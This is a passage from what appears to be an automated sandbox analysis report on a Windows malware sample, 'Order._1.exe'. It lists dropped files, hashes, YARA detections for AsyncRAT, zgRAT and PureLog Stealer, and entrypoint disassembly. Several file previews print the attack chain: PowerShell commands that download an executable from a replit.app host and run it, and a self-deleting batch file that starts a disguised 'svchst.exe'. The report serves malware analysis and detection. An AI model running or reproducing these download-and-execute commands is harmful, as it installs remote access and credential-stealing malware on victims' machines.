                    • 194.15.112.248
                    • 34.117.33.233
                    https://woodoo-f51962.ingress-baronn.ewp.live/wp-content/plugins/guven/pages/region.phpGet hashmaliciousUnknownBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    solarabootstrapper.exeGet hashmaliciousXWormBrowse
                    • 194.15.112.248
                    • 34.117.33.233
                    No context
                    Process:C:\Users\user\AppData\Roaming\svchst.exe
                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                    Category:dropped
                    Size (bytes):71954
                    Entropy (8bit):7.996617769952133
                    Encrypted:true
                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                    Process:C:\Users\user\AppData\Roaming\svchst.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):328
                    Entropy (8bit):3.247897867253902
                    Encrypted:false
                    SSDEEP:6:kK09UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:vDImsLNkPlE99SNxAhUe/3
                    MD5:7D2497A28D77E793682C10601F1106E8
                    SHA1:B860513156C5BA4857C3BF9492B74F663613BF80
                    SHA-256:8B68EB8B8B8B24EF2C800CA941584AC870E3604077076F8FACE822C8AEF5AA63
                    SHA-512:C820A215E3C621D5D2375CF7CC82784BCE6C86C257D9542F07DB46106BB42127CBB464A8D2E58F7B1B1E84095D985FD715FA1B593156909D8CF5EA8448403026
                    Malicious:false
                    Preview:p...... ........j..`...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                    Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):944
                    Entropy (8bit):5.351116490279513
                    Encrypted:false
                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4Kzer84j:MxHKlYHKh3oPtHo6hAHKzervj
                    MD5:A4AD9642B1D9E75F65BCFF0E383D274F
                    SHA1:6FFB77BAB80023486A6B72A108E8B1280104649E
                    SHA-256:E96412EECCA9FB8FAC8C09170223DAD3F52A98A52EECF462BC4F3E2720251027
                    SHA-512:743302453D5AF5301B9AD953E111EBED2F61AB0CF2159CEEF80279A48377F08C276CE5B33CBE1441667C72B42440B9B03FC3DDA1B9A274B977876978CC39FB92
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                    Process:C:\Users\user\AppData\Roaming\svchst.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):425
                    Entropy (8bit):5.353683843266035
                    Encrypted:false
                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                    MD5:859802284B12C59DDBB85B0AC64C08F0
                    SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                    SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                    SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):0.34726597513537405
                    Encrypted:false
                    SSDEEP:3:Nlll:Nll
                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                    Malicious:false
                    Preview:@...e...........................................................
                    Process:C:\Users\user\Desktop\Order._1.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):336
                    Entropy (8bit):5.03538167547362
                    Encrypted:false
                    SSDEEP:6:NOkA1as8qOLh8CgkBanFLW3Hff43s8qOLh8CgkBanFR/sQyyd1sm1N:NOJUs8JGbDnBWX43s8JGbDnMQyyd1H1N
                    MD5:01C5CDA0BD57D42A84BEFF225913C7F6
                    SHA1:1047C8CE097C87214B5337C98278F4CE5A5896F7
                    SHA-256:454734FF80F0FF62344D6ADEAF700983B1D5DA605D192226E3A1E40020EC0D31
                    SHA-512:76AF6D488D7FDF8D701D16E0C884811DF4C7A7BF34B74C30F7E993490420EBB895889048AE9EC5CA82D037F49DE42028FCA751D66915DF543CD4394FCFF727B2
                    Malicious:false
                    Preview:@shift /0..cd %TEMP%..Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"..purchaseOrder.PNG..Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"..CoinAIfdp.exe
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):402432
                    Entropy (8bit):5.863361032556363
                    Encrypted:false
                    SSDEEP:6144:pviKqHZZ16CQRTzqPbtE7PgQM0n2d3LGcm7Yib:pLu1U6nQMY2d36cm7Y
                    MD5:1B3E4783A56A59A811CBD437C6C34A18
                    SHA1:1C3C098D76F93570C6F72A815EE1E257DA9E2A7F
                    SHA-256:B92D49DB7714FCADCFA107DBC3A37A12FA30E4AADEBD1EB1D551CCFE61F638DE
                    SHA-512:C7AB45B5376677CE3484B2D575304FE23A38EB1491245D899E57C6491C999704318D6F5BF5B2FA560692BF52C531C4445F999E95269A1443323FCCB73AC58E38
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, Author: Joe Security
                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe, Author: Joe Security
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 71%
                    • Antivirus: Virustotal, Detection: 59%, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............7... ...@....@.. ....................................`..................................7..K....@.......................`......g7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................7......H........I..Tu.............#v...6.......................................0..Q....... ........8........E....................a.......=...8....8.... ....8....~....9.... ....~....{....:....& ....8....8k... ....~....{....9....& ....8~.......~(...(S...~)...(W... ....<.... ....~....{....9H...& ....8=...r...ps....z*...... ....~....{....9....& ....8....~&...(K... .... .... ....s....~'...(O....... ....~....{....9....& ....8........0.......... ........8........E....)...9.......8...8$...
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, manufacturer=BeFunky, orientation=upper-left, xresolution=94, yresolution=102, resolutionunit=2, software=BeFunky Photo Editor], baseline, precision 8, 1319x1003, components 3
                    Category:dropped
                    Size (bytes):187448
                    Entropy (8bit):7.978073132300376
                    Encrypted:false
                    SSDEEP:3072:PdnWNVoJEPuBCMl4fGFGQXTAi4PuptMWErNIjYnK/RMcZyx1hWHf6zf1:1nW7omPevKO1ETrN4McS1hwy9
                    MD5:4F38547E1600BE2578340D8978D39AC8
                    SHA1:B6ED4E313DF8EE534F30431BD1BFDC785B3AA290
                    SHA-256:8B0DE00A83E7A8EED9D4DADE444602F859EA9DCE0D116D6D7120B370F1143E98
                    SHA-512:ED64F5DA5E0421877EFB26FBDEFE9E843C29988530B57338DF05D5805810E90911184C2D77846CF5DA53255D247C722C654FD608A46D4127459D9CA4E6A1F7D5
                    Malicious:false
                    Preview:......Exif..MM.*.................V.......................^...........f.(...........1.........n....BeFunky....,.......,....BeFunky Photo Editor.....JFIF.....,.,......ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C.........................................................................'.."...........................................R...........................!......1QRST..A."2aq...#345Brs....$6Ut..7b..C%Dc...d...................................N..........................!1A...Q...."RSq...2Ua..#b....
                    Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):158
                    Entropy (8bit):5.091292359108959
                    Encrypted:false
                    SSDEEP:3:mKDDCMNqTtvL5o0nacwREaKC5eAZmqRD0nacwRE2J5xAInTRI3SrV5ZPy:hWKqTtT6cNwiaZ5fZmq1cNwi23fTLrVa
                    MD5:61BA5793BDAA0AD59D39D033FE1C89D4
                    SHA1:951AFF1B04D0AE970E3A6A3E8CF67FC35A2A1547
                    SHA-256:EA1FB5EFF92B812DD5CEA5EAF243A19D3AF53E4EB5F5819F8729969D56949C12
                    SHA-512:58EF233CE15FF72F11534250A0D54C84C3DA9A8D9EF8DBD8B1B53032188F757B7450EE4B641FC67DE07EB8EABE36DB6B834B217BABFC3D934D83C91D0087C6E9
                    Malicious:false
                    Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchst.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp87D1.tmp.bat" /f /q..
                    Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):77280
                    Entropy (8bit):7.997649315699158
                    Encrypted:true
                    SSDEEP:1536:YZFIZZpfRYzOBYqP4PF4BS1VCkwpxa0/jb2zhstpuYk/TbGb7F2vi1Rz6g:oIZZZRKPAOVMqzh8uYk7bGfF27g
                    MD5:BC45E0B2F1DCFA525073B0E838114E38
                    SHA1:5000F01BFE81A0CF2570659053B8AFBF9805C404
                    SHA-256:004FB26F906F92591AAE25E8C836FB39DAD86469144286E323015B35F9B8D938
                    SHA-512:FC8AD730A10CF4C31CA178ED0CCFE58F62C7A3954E780394D45FC1B1B67708981BBF16EDB32D1636E995826C8CFEA78C0C870F5F3CF016378194BBE5DF737C07
                    Malicious:false
                    Preview:.EV....Z....{.....wY~.. .....-.cEh.....:.....f.....00...@..K.6Y./y..R...lHT].C.....5..k/...W...\m......paQ.V.L...2O..@G.f.T.F.EE).0..Hp.w!~....A.w.m}V~$9..T.>rQ..W...G*T.......h..>d.......!.1.9{.}..`J.........Q.....d._.z....V.B t..5}4o$.L|.?w..{/RC.s........c..z....d4&G...p....J4..._.f. k.M.h..n..iO.......|.4.%,..x.. $.I...}..GwSZ9J.Z..A.&.8.L....w..g....EN!c.D......2...:...d........j.....6#..P..}J.0.}...g.>...-.D........o.y...m......;..Ny........L...{...w...H)....Ywu.....*M..o.k.:0C.I.fD...W......1....."o.....#.......h.`./...b.GB5...U.{.NZY.......I&]..-..+m..H.4..(......p.>..F..[(Sq?..e.j.6....?.*.G.V.W...N.#.@....w...(.w..=z,f.]Zj.;..y.."[".C../.s:...$D.[1.NV..M.!.3s^.._"..M....g)..^.>.........A..q......9..].O..x......KQ%rm .F'.....o........-P.A..U.H...M&.../.z..a".,...#py...Z.....DR-.^...X...c...g.V..h...)..T.....{..r<Q.c..Y)q.)po'.P..q..15..hm.%.b.......8.D|... v....m..p.. ..q..z*.......u.9A....gST....V.....fC~P....M...%qAbZ
                    Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):77269
                    Entropy (8bit):5.815436890850354
                    Encrypted:false
                    SSDEEP:1536:9MSYukzVT0Mq12kX/i3bWXSzWs3gjdix+cS7i9u6yeNejY6yFOB:0ukxT0MY2kPi3bWKWs3AQx+cS7DZW6ys
                    MD5:834CFE4C91E1AA48057F85F67999ADC8
                    SHA1:2803F3605AF8F9C1F34011060B1413792E57C258
                    SHA-256:7E7039D296A5E761E4E8950966A05311D8B52055E31178EAA0B22E6AEC51D85F
                    SHA-512:0FEF2021AC2E0ECED4914AD022438CAF116C2E93074FD36A498229094246BD29A320BA9D1B112F6994E7AB3A268E6A95371844BA78202AFD45752CE4FC0DCD1C
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, Author: Joe Security
                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, Author: unknown
                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, Author: unknown
                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, Author: ditekSHen
                    Preview:......................................................R.U.."....pZ/._y..w....j..*..bR.{.....v.R......>..c ..}..~|@)....f.....(=.A...e_.3y..c...^UD..^Wo..........r6......G$j...`.....").....=n....|..yz...\.1..^y....AkD...S...Q.O$3....k.}.._..lI.!..p....;.>.G...hi%.w.M.......D..@. .}....Fp.`V:.....L...E.."r.D..<s.[..S.?>.f..|...0:....F...@..}wWP..&.....?.p....>T..&j..k5._.j..n:r.m.K..!..C.G....r...Q.5r..EI....`'.A>YF..R=C.._-Y.......i....77E6`Q/...CO.......s.G...)..j).N..D.......v....0.4..3.6._+.........&....&.@..r;`T....]L"].........................?...ole32;oleaut32;wininet;mscoree;shell32..............................................................................................................................................................................................................................................amsi....clr.wldp....ntdll......................................................................................................................
                    Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):402432
                    Entropy (8bit):5.863361032556363
                    Encrypted:false
                    SSDEEP:6144:pviKqHZZ16CQRTzqPbtE7PgQM0n2d3LGcm7Yib:pLu1U6nQMY2d36cm7Y
                    MD5:1B3E4783A56A59A811CBD437C6C34A18
                    SHA1:1C3C098D76F93570C6F72A815EE1E257DA9E2A7F
                    SHA-256:B92D49DB7714FCADCFA107DBC3A37A12FA30E4AADEBD1EB1D551CCFE61F638DE
                    SHA-512:C7AB45B5376677CE3484B2D575304FE23A38EB1491245D899E57C6491C999704318D6F5BF5B2FA560692BF52C531C4445F999E95269A1443323FCCB73AC58E38
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\svchst.exe, Author: Joe Security
                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\svchst.exe, Author: Joe Security
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 71%
                    • Antivirus: Virustotal, Detection: 59%, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............7... ...@....@.. ....................................`..................................7..K....@.......................`......g7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................7......H........I..Tu.............#v...6.......................................0..Q....... ........8........E....................a.......=...8....8.... ....8....~....9.... ....~....{....:....& ....8....8k... ....~....{....9....& ....8~.......~(...(S...~)...(W... ....<.... ....~....{....9H...& ....8=...r...ps....z*...... ....~....{....9....& ....8....~&...(K... .... .... ....s....~'...(O....... ....~....{....9....& ....8........0.......... ........8........E....)...9.......8...8$...
                    Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):77269
                    Entropy (8bit):5.815436890850354
                    Encrypted:false
                    SSDEEP:1536:9MSYukzVT0Mq12kX/i3bWXSzWs3gjdix+cS7i9u6yeNejY6yFOB:0ukxT0MY2kPi3bWKWs3AQx+cS7DZW6ys
                    MD5:834CFE4C91E1AA48057F85F67999ADC8
                    SHA1:2803F3605AF8F9C1F34011060B1413792E57C258
                    SHA-256:7E7039D296A5E761E4E8950966A05311D8B52055E31178EAA0B22E6AEC51D85F
                    SHA-512:0FEF2021AC2E0ECED4914AD022438CAF116C2E93074FD36A498229094246BD29A320BA9D1B112F6994E7AB3A268E6A95371844BA78202AFD45752CE4FC0DCD1C
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, Author: Joe Security
                    • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, Author: unknown
                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, Author: unknown
                    • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, Author: ditekSHen
                    Preview:......................................................R.U.."....pZ/._y..w....j..*..bR.{.....v.R......>..c ..}..~|@)....f.....(=.A...e_.3y..c...^UD..^Wo..........r6......G$j...`.....").....=n....|..yz...\.1..^y....AkD...S...Q.O$3....k.}.._..lI.!..p....;.>.G...hi%.w.M.......D..@. .}....Fp.`V:.....L...E.."r.D..<s.[..S.?>.f..|...0:....F...@..}wWP..&.....?.p....>T..&j..k5._.j..n:r.m.K..!..C.G....r...Q.5r..EI....`'.A>YF..R=C.._-Y.......i....77E6`Q/...CO.......s.G...)..j).N..D.......v....0.4..3.6._+.........&....&.@..r;`T....]L"].........................?...ole32;oleaut32;wininet;mscoree;shell32..............................................................................................................................................................................................................................................amsi....clr.wldp....ntdll......................................................................................................................
                    Process:C:\Windows\SysWOW64\timeout.exe
                    File Type:ASCII text, with CRLF line terminators, with overstriking
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.41440934524794
                    Encrypted:false
                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                    Malicious:false
                    Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):5.269182275080078
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.94%
                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • VXD Driver (31/22) 0.00%
                    File name:Order._1.exe
                    File size:295'424 bytes
                    MD5:587be0c9be93274c3d38ef27c3a50aa4
                    SHA1:6808c0da1276c7ad2021ffb7c0b8d743f5c87b35
                    SHA256:cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8
                    SHA512:5d2dbadb93ae2d91c3e7af58be9b28a7270a86b1c3b2bfbae64f232a06f26efa72162dc4adb22ce1f269429eecb2d4b5b44e1c1494658de702c1f2dad0c9c879
                    SSDEEP:3072:Cq6+ouCpk2mpcWJ0r+QNTBf2Wk1qXkXRA4XTZ5N:Cldk1cWQRNTB+l8KN
                    TLSH:EF540FD1B1494265EE6ABAF085A7253393D39DE6476CD70E424BBF132FB2342105BA0F
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....r...............0....@........................................................................
                    Icon Hash:9c060f2a23311a5b
                    Entrypoint:0x401000
                    Entrypoint Section:.code
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    DLL Characteristics:
                    Time Stamp:0x5D400562 [Tue Jul 30 08:52:50 2019 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:5877688b4859ffd051f6be3b8e0cd533
                    Instruction
                    push 000000ACh
                    push 00000000h
                    push 00418010h
                    call 00007F5F6516E921h
                    add esp, 0Ch
                    push 00000000h
                    call 00007F5F6516E91Ah
                    mov dword ptr [00418014h], eax
                    push 00000000h
                    push 00001000h
                    push 00000000h
                    call 00007F5F6516E907h
                    mov dword ptr [00418010h], eax
                    call 00007F5F6516E881h
                    mov eax, 00417088h
                    mov dword ptr [00418034h], eax
                    call 00007F5F651776A2h
                    call 00007F5F6517740Eh
                    call 00007F5F65174308h
                    call 00007F5F65173B8Ch
                    call 00007F5F6517361Fh
                    call 00007F5F65173399h
                    call 00007F5F65172EBDh
                    call 00007F5F6517263Dh
                    call 00007F5F6516EC05h
                    call 00007F5F65175F88h
                    call 00007F5F65174A30h
                    mov edx, 0041702Eh
                    lea ecx, dword ptr [0041801Ch]
                    call 00007F5F6516E898h
                    push FFFFFFF5h
                    call 00007F5F6516E8A8h
                    mov dword ptr [0041803Ch], eax
                    mov eax, 00000200h
                    push eax
                    lea eax, dword ptr [004180B8h]
                    push eax
                    xor eax, eax
                    push eax
                    push 00000015h
                    push 00000004h
                    call 00007F5F651735E2h
                    push dword ptr [004180A0h]
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1717c0xc8.data
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x32b20.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
